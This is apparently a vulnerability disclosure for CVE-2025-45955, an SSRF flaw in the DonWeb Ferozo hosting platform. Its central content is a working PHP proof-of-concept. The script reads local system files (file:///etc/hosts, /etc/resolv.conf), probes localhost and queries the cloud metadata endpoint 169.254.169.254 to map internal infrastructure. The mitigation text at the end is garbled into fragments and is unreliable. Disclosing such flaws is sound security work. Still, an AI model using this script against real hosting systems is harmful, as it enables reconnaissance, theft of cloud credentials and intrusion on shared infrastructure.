
Proof-of-concept exploit for CVE-2025-45955 demonstrating Server-Side Request Forgery (SSRF) in DonWeb Ferozo hosting platform, enabling internal infrastructure mapping and cloud metadata enumeration.
An attacker can exploit this vulnerability by uploading and executing a specially crafted PHP file on the Ferozo hosting platform. When accessed, the file launches a series of SSRF attempts targeting internal services (such as 127.0.0.1, 169.254.169.254, or service mesh endpoints), local files (e.g., file:///etc/passwd), and known cloud metadata endpoints. The script collects responses or error messages, allowing the attacker to map internal infrastructure, enumerate accessible services, and gather sensitive information for further exploitation.
The following code demonstrates the vulnerability:
<?php
$targets = [
"file:///etc/hosts",
"file:///etc/resolv.conf",
"http://127.0.0.1/",
"http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
echo "[*] Trying: $url\n";
$res = @file_get_contents($url);
echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>
file_get_contents, fopen, etc.)127.0.0.0/8, 169.254.169.254, etc.) via outbound firewall rulesCVE-2025-45955
Reported by [Facundo Fernandez, Jinook Kim, Surendra Puppala / Security Researchers | @BYU]